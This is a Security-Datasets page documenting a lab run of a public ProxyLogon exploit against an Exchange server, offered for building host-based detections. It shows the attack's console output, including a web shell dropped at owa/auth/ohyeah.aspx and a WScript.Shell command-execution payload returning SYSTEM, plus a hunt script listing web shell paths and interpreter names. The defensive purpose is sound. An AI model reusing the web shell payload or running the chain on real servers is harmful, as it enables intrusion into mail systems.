# Exchange ProxyLogon SSRF RCE Vuln POC
## Metadata

| Field | Value |
|---|---|
| Contributors | Roberto Rodriguez @Cyb3rWard0g |
| Creation Date | 2021/03/14 |
| Modification Date | 2021/03/14 |
| Tactics | |
| Techniques | |
| Tags | None |
## Dataset Description

This dataset captures the execution of a public proof-of-concept (POC) exploit for the Microsoft Exchange ProxyLogon vulnerability chain against a single Exchange host. The POC first abuses the pre-authentication server-side request forgery (SSRF) vulnerability CVE-2021-26855 to reach back-end Exchange services as the targeted mailbox owner (the adversary view below shows it retrieving the user's DN and SID, an ECP session id and CSRF canary, and the OAB virtual directory id), then uses that foothold together with the post-authentication arbitrary file write (CVE-2021-27065) to drop an ASPX web shell (`ohyeah.aspx`) under the OWA `auth` directory and run `cmd /c whoami`, which comes back as `nt authority\system`. The telemetry is host-based Windows event log data, so it is suited to building detections for the web shell being written to disk and for the IIS worker process spawning a command interpreter, not for the network side of the SSRF itself.
## Datasets Downloads

| Type | Link |
|---|---|
| Host | https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/proxylogon_ssrf_rce_poc.zip |
## Adversary View

```
C:\Users\wardog.MXS01\Documents>
C:\Users\wardog.MXS01\Documents>python public-poc.py localhost wardog@azsentinel.local
Attacking target localhost
=============================
Got DN: /o=azsentinel/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=6beef80bd6d14a68b9ae39df7f27a8cc-wardog
Got SID: S-1-5-21-594047938-393122191-2580508586-500
Got session id: e243cd06-1093-40d4-829c-63f3b9caea9b
Got canary: pYoEXlKOqkGQMt3Dv3qJUExebVlG6NgI3c_XeQNd-VRV8lo6E5zskoLPJB0uOOGITLTC08eVUkk.
Got OAB id: becafe73-b0c1-4f36-8df4-85f682840ef4
Ready!
Testing command:
===============
POST shell:https://localhost/owa/auth/ohyeah.aspx
code":"Response.Write(new ActiveXObject("WScript.Shell").exec("cmd /c whoami").StdOut.ReadAll());
[*] Waiting for ohyeah.aspx to be available..
[*] Waiting for ohyeah.aspx to be available..
Results:
========
nt authority\system
C:\Users\wardog.MXS01\Documents>
```
## Explore Datasets

### Download & Decompress Dataset

```python
import requests
from zipfile import ZipFile
from io import BytesIO

# Dataset archive hosted in the OTRF Security-Datasets repository
url = "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/proxylogon_ssrf_rce_poc.zip"
zipFileRequest = requests.get(url)
zipFileRequest.raise_for_status()

# The archive contains a single JSON-lines file; extract it into the working directory
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])
```

### Read JSON File

```python
import pandas as pd

# One JSON object per line, hence lines=True
df = pd.read_json(datasetJSONPath, lines=True)
```

### Access Security Events

```python
# Count events per Windows event log channel, most common first
df.groupby(['Channel']).size().sort_values(ascending=False)
```
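The channel summary above only tells you which logs are present. What a detection engineer wants from this dataset is the two host-side artifacts of the chain shown in the adversary view: an ASPX file being created under an Exchange web directory, and the IIS worker process spawning a command interpreter. The following is an added example, not code from the Security-Datasets page or the OTRF project; it runs a small hunt over constructed Sysmon-style records (labelled as such in the code) whose field names mirror the JSON-lines export (`Channel`, `EventID`, `Image`, `ParentImage`, `TargetFilename`, `CommandLine`). The Exchange directory fragments, the `w3wp.exe` parent and the interpreter list are assumptions to tune for your environment. To run it against the real dataset, pass `df.to_dict("records")` to `hunt()` instead of the sample.

```python
"""Hunt for ProxyLogon-style web shell artifacts in Security-Datasets JSON records.

Added example (not the dataset page's own code). The records in SAMPLE_EVENTS are
constructed for illustration; paths, process names and the interpreter list are
assumptions, not values taken from the dataset.
"""
import json

# Constructed sample records (not real dataset lines), one JSON object per line.
SAMPLE_EVENTS = r"""
{"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 11, "Image": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "TargetFilename": "C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ohyeah.aspx"}
{"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 11, "Image": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "TargetFilename": "C:\\inetpub\\temp\\IIS Temporary Compressed Files\\app.gz"}
{"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "CommandLine": "cmd /c whoami"}
{"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1, "Image": "C:\\Windows\\System32\\svchost.exe", "ParentImage": "C:\\Windows\\System32\\services.exe", "CommandLine": "svchost.exe -k netsvcs"}
{"Channel": "Security", "EventID": 4624, "LogonType": 3}
"""

# Assumptions: server-side script extensions IIS will execute, Exchange web roots
# (lower-cased path fragments), the IIS worker process, and interpreters a web shell
# typically launches. Tune these for the install you are hunting on.
WEBSHELL_EXTENSIONS = (".aspx", ".ashx", ".asmx", ".asp")
EXCHANGE_WEB_DIRS = (
    "\\frontend\\httpproxy\\",
    "\\clientaccess\\",
    "\\inetpub\\wwwroot\\aspnet_client\\",
)
IIS_WORKER = "w3wp.exe"
SHELL_CHILDREN = ("cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe")


def load_jsonl(text):
    """Parse JSON-lines text into a list of event dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def _basename(path):
    """Return the lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_webshell_write(event):
    """Sysmon EventID 11 (FileCreate) of a script file inside an Exchange web root."""
    if event.get("EventID") != 11:
        return False
    target = event.get("TargetFilename", "").lower()
    return target.endswith(WEBSHELL_EXTENSIONS) and any(d in target for d in EXCHANGE_WEB_DIRS)


def is_shell_from_iis(event):
    """Sysmon EventID 1 (ProcessCreate) where the IIS worker spawns an interpreter."""
    if event.get("EventID") != 1:
        return False
    return (
        _basename(event.get("ParentImage", "")) == IIS_WORKER
        and _basename(event.get("Image", "")) in SHELL_CHILDREN
    )


def hunt(events):
    """Return (rule_name, evidence) pairs for every event matching either rule."""
    hits = []
    for event in events:
        if is_webshell_write(event):
            hits.append(("webshell_write", event["TargetFilename"]))
        elif is_shell_from_iis(event):
            hits.append(("iis_child_shell", event.get("CommandLine", "")))
    return hits


if __name__ == "__main__":
    for rule, evidence in hunt(load_jsonl(SAMPLE_EVENTS)):
        print(f"{rule}: {evidence}")
```

Both rules are deliberately independent of the writing process: in this chain the shell is dropped through Exchange's own code paths, so keying the file rule on which image wrote the file would miss variants, whereas an `.aspx` appearing under a front-end web root is rare in normal operation. The process rule is the cheaper, noisier signal and is worth correlating with the file rule on the same host within a short window.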